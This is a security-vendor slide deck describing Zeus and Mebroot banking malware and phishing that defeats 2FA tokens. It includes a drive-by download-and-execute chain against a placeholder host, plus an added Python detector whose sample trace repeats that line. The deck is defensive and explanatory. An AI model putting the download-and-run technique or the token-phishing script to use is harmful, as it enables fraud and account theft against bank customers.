Learning from the bad guys is learning from the best

Posted 23-Feb-2016
Page 1: Learning from the bad guys is learning from the best

Learning from the bad guys is learning from the best

A practical overview on how the bad guys adopt and circumvent security initiatives

Commercial – in - Confidence

Alex Shipp, Imagineer

Page 2

Zeus: one of the most successful rootkits

Features:

- It steals the user's private and confidential information (form grabber)
- Can inject arbitrary HTML code into any website (including encrypted websites)
- Can steal certificates
- Takes screenshots to defeat virtual keyboards
- BackConnect feature (SOCKS, BackConnect, VNC)
- Everything is encrypted

Page 3

Zeus v2.0

- Enhanced Zeus v2 core engine
- Able to infect Mozilla Firefox
- Able to infect Windows Vista and Windows 7
  ▪ They do everything in user-mode (!)
- New encryption method
- Details in the TrustDefender Labs report

Page 4

Zeus plugins

- Zeus supports a plugin-style infrastructure
- New BackConnect mechanism
  ▪ E.g. real-time notification via IM once a victim is online
  ▪ SOCKS / VNC works even behind NAT
- Extensive JavaScript engine that can be plugged into Zeus v1 or Zeus v2

Page 5

JavaScript engine

- Dramatically increased functionality: with JavaScript code they can harvest any challenge/response and/or token values in real time and in a more interactive way.
- Allows bypass of nearly all challenge mechanisms (e.g. SMS/email/VRU out-of-band, token, secret questions/answers, elaborate challenge/response)

Page 6

JavaScript engine: observations

- No "static" HTML injections anymore
- Nothing happens until after the login
- Dynamic connection to the C&C server
  ▪ Send/receive data within one webpage
  ▪ Transparent to the web browser
- Dynamic content delivery
  ▪ E.g. after compromise, they return a "24h maintenance" page

But let's have a look

Page 7

Login page (unmodified)

Page 8

Account verification

Page 9

Cover your tracks

Page 10

WesCorp login

Page 11

OK, I have to use the token (nothing unusual)

Page 12

Authorizing... (60 down to 0)

Page 13

Oops... timeout

Page 14

After restart, the machine is gone

Page 15

JavaScript engine

- As well as manipulating user-supplied content, they can also access system-supplied content.
- Bad news if you "encrypt" the password on the client side: Zeus can just inject code into your JavaScript files (!)

Page 16

JavaScript engine

Watch the download of loginPin.js

And once it's downloaded...

Page 17

Completely transparent

Page 18

Device fingerprinting won't help

- BackConnect feature via SOCKS or VNC
- Undermines any device fingerprinting

Page 19

How is Zeus distributed?

- Drive-by attacks
  ▪ PDF, Flash or any other software
- Phishing attacks
- Heavily geo-based distribution

This is done via a Flash object that calls URLMON.DLL!URLDownloadToFileA to save http://<<hostname>>/l.php?i=18 locally as pdfupd.exe and then executes it with WinExec.

More details in the next TrustDefender Labs report
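The download-then-execute chain above (URLDownloadToFileA saving a payload, then WinExec starting it) is something a sandbox or API-monitor trace can be checked for. The following detection script is an added example, not code from the slides or from TrustDefender; the trace format, the process ids and the file paths are constructed assumptions, and the hostname placeholder is kept as the slide gives it.

```python
"""Flag the download-then-execute chain from the drive-by slide.

Added example (not from the slides or TrustDefender): it scans API-call
trace lines in a constructed, hypothetical 'pid module!api(key="value", ...)'
format and reports a process that downloads a file with URLDownloadToFileA
and later starts that same path with WinExec.
"""
import re
from collections import defaultdict

# Constructed sample trace for this example; only the first process shows
# the chain described on the slide (l.php?i=18 saved as pdfupd.exe, then WinExec).
SAMPLE_TRACE = """\
1234 URLMON.DLL!URLDownloadToFileA(url="http://<<hostname>>/l.php?i=18", file="C:\\Temp\\pdfupd.exe")
1234 KERNEL32.DLL!WinExec(cmd="C:\\Temp\\pdfupd.exe", show=0)
5678 URLMON.DLL!URLDownloadToFileA(url="http://<<hostname>>/update.cab", file="C:\\Temp\\update.cab")
5678 KERNEL32.DLL!CreateFileA(file="C:\\Temp\\update.cab")
9012 KERNEL32.DLL!WinExec(cmd="notepad.exe", show=1)
"""

LINE_RE = re.compile(r'^(?P<pid>\d+) (?P<api>[\w.!]+)\((?P<args>.*)\)$')
ARG_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_trace(text):
    """Yield (pid, api_name, {arg: value}) for every well-formed trace line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        args = dict(ARG_RE.findall(m.group('args')))
        yield m.group('pid'), m.group('api').split('!')[-1], args


def find_download_exec(text):
    """Return [(pid, url, command)] where a downloaded path is later executed."""
    downloaded = defaultdict(dict)  # pid -> {lower-cased saved path: source url}
    hits = []
    for pid, api, args in parse_trace(text):
        if api == 'URLDownloadToFileA' and 'file' in args:
            downloaded[pid][args['file'].lower()] = args.get('url', '')
        elif api == 'WinExec':
            # WinExec takes a command line; the first token is the program path
            program = args.get('cmd', '').strip('"').split(' ')[0].lower()
            if program in downloaded[pid]:
                hits.append((pid, downloaded[pid][program], args['cmd']))
    return hits


if __name__ == '__main__':
    for pid, url, cmd in find_download_exec(SAMPLE_TRACE):
        print(f'pid {pid}: fetched {url} then executed {cmd}')
```

The correlation is per process and by saved path, so a download that is never executed (the second process) and an unrelated WinExec (the third) are not reported.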

Page 20

- Mebroot is by far the most successful rootkit that is able to stay under the radar
- Technically sophisticated, but also very clever
- We know that they could infect many more machines, but don't do so
- Bad news: they have a comprehensive JavaScript engine as well; however, it is not used yet (AFAWK)

What is Mebroot doing?

Page 21

Sizzler CSS Selector Engine

- If it looks scary, it is scary
- Watch out for simple device authentication

What is Mebroot doing?

Page 22

Phishing still works (!)

Real-world example:

- Bank uses transactional 2FA hardware tokens
- Phishing site asks for login credentials + private phone number
- Fraudsters ring the customer and tell him that his account got compromised (which is true!), and that in order to get it reconnected he should enter the following number into his token and confirm the reply!

Phishing with transactional 2FA

Page 23

TrustDefender Labs

- ... is the R&D arm of TrustDefender
- TrustDefender is an online-transaction security solution providing real-time customer endpoint risk assessment & protection for online transactions
- More info: http://www.trustdefender.com/blog

Page 24

- Bad guys adopt heavily
- Protect all parts of the chain. If one breaks, the chain is broken

Questions?